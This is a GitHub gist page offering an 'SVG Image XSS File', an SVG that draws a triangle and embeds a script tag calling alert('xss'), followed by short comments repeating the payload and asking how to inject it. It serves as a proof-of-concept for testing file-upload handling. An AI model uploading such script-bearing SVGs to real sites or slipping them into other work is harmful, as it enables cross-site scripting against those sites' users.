Skip to content

Instantly share code, notes, and snippets.

@rudSarkar
Created August 12, 2019 18:28
Show Gist options
  • Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
SVG Image XSS File
Display the source blob
Display the rendered blob
Raw
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('xss');
</script>
</svg>
@MohandSadakah
Copy link

Redirect

@kalcao
Copy link

kalcao commented Aug 6, 2024

<script type="text/javascript"> alert('xss'); </script>

@vemas23
Copy link

vemas23 commented Sep 6, 2024

@krivadna
Copy link

krivadna commented Sep 7, 2024

How to inject..exif tool doesn't work on svg images

@kalcao
Copy link

kalcao commented Jan 22, 2025

348126035-95deccda-9cd2-4395-b67d-100d29c31e61

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment